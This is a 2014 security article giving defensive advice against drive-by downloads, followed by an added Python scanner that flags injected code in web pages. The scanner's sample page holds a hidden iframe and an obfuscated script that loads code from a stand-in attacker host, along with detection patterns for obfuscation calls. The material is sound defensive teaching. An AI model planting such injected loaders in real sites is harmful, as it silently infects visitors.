Defending against drive-by downloads
by Corey Nachreiner - Director of Security Strategy at WatchGuard - Monday, 3 February 2014.
The attackers search for web application vulnerabilities in popular and legitimate web sites, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit these problems to inject malicious code into the legitimate site, redirecting anyone who visits the site to malicious DbD code.

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. However, today any site on the Internet—even the ones you trust the most—may have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversary’s techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is, and how it works, here are a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more – In “computer-ese,” patching means to apply the latest updates to your computer software. As mentioned, web sites can’t forcefully download software to your computer unless they can take advantage of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed. If you keep your software up to date, most of these attacks will fail. Obviously patch your web browser, but also know that hackers have been focusing on exploiting Java and Flash vulnerabilities lately. You should patch these packages just as aggressively as the browser itself. In fact, I would recommend disabling Java if you can.

Don’t click unsolicited links – Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably can’t convince you not to click on links from your friends (or ones that seem like they come from your friends), but at least remain wary of them, and look at the URL of the link before clicking it. I would also be careful around shortened links, and leverage tools to expand and preview these links before following them. Here’s a quick tip: if you add a “+” character to the end of a bit.ly link, you will see a preview of the actual URL before visiting it.

Use antivirus (AV) and intrusion prevention (IPS) – While vigilance and good practices can help you avoid many attacks, no one is perfect. There will be a day when even the best of us stumble onto a DbD attack site. IPS systems can frequently detect the network exploits these attacks leverage, and AV systems can often recognize the malicious payloads they try to silently download. Use AV and IPS systems, and keep them up to date.

Use reputation-based web-filtering solutions – The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to keep track of the latest malware distributing sites, and offer reputation services that can keep you and your users away from them. You should consider using web-filtering solutions to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others) – Without going into all the technical details, know that many DbD attacks rely on web scripting languages, such as JavaScript and ActiveX, to carry out their attacks. Disabling these scripting technologies would block a huge majority of DbD attacks. Unfortunately, it’s not quite that simple. Many legitimate web sites also use these scripting languages for perfectly normal aspects of their web site. That’s why I recommend script whitelisting technologies like Firefox’s NoScript or Chrome’s NotScripts or Click-to-Play. These plugins will prevent scripts and some dynamic web content from running by default, but also allow you to easily whitelist sites you trust.
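As an added illustration of the injection described above (example code, not from the article or WatchGuard): a small site-owner check that scans a page’s HTML for the hallmarks of injected drive-by code, namely hidden iframes, script sources outside the site’s own allowlist (the same whitelisting idea NoScript applies in the browser), and inline scripts built from obfuscation primitives. The sample page and every hostname in it are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a legitimate site's page after an attacker has injected
# a hidden iframe, a third-party script and an obfuscated inline script.
# All hostnames are made up (.test is a reserved TLD).
SAMPLE_HTML = """
<html><head>
<script src="https://www.example-news.test/js/site.js"></script>
<script src="https://cdn.example-news.test/jquery.min.js"></script>
<script src="http://stats-tracker.test/t.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://bad-redirector.test/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//evil.test/x.js%22%3E%3C/script%3E'));</script>
</body></html>
"""

# Hosts the site owner knows they legitimately load scripts from (assumed).
TRUSTED_HOSTS = {"www.example-news.test", "cdn.example-news.test"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATION_RE = re.compile(r"\b(unescape|eval|fromCharCode)\s*\(", re.I)


def find_injections(html, trusted_hosts):
    """Return (kind, evidence) tuples for content typical of injected DbD code."""
    findings = []
    # 1. Hidden or zero-size iframes: the classic silent redirect hook.
    for tag in IFRAME_RE.findall(html):
        lower = tag.lower()
        if ('width="0"' in lower or 'height="0"' in lower
                or "visibility:hidden" in lower or "display:none" in lower):
            findings.append(("hidden_iframe", tag))
    # 2. External scripts served from hosts not on the site's own allowlist.
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname or ""
        if host not in trusted_hosts:
            findings.append(("untrusted_script_src", src))
    # 3. Inline scripts that decode or eval their real payload at run time.
    for body in INLINE_SCRIPT_RE.findall(html):
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated_inline_script", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, evidence in find_injections(SAMPLE_HTML, TRUSTED_HOSTS):
        print(f"{kind}: {evidence}")
```

Run it against your own site’s pages on a schedule and alert on any new finding; a page that was clean yesterday and carries a hidden iframe today is the hijack this article describes.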

Copyright 1998-2014 by Help Net Security.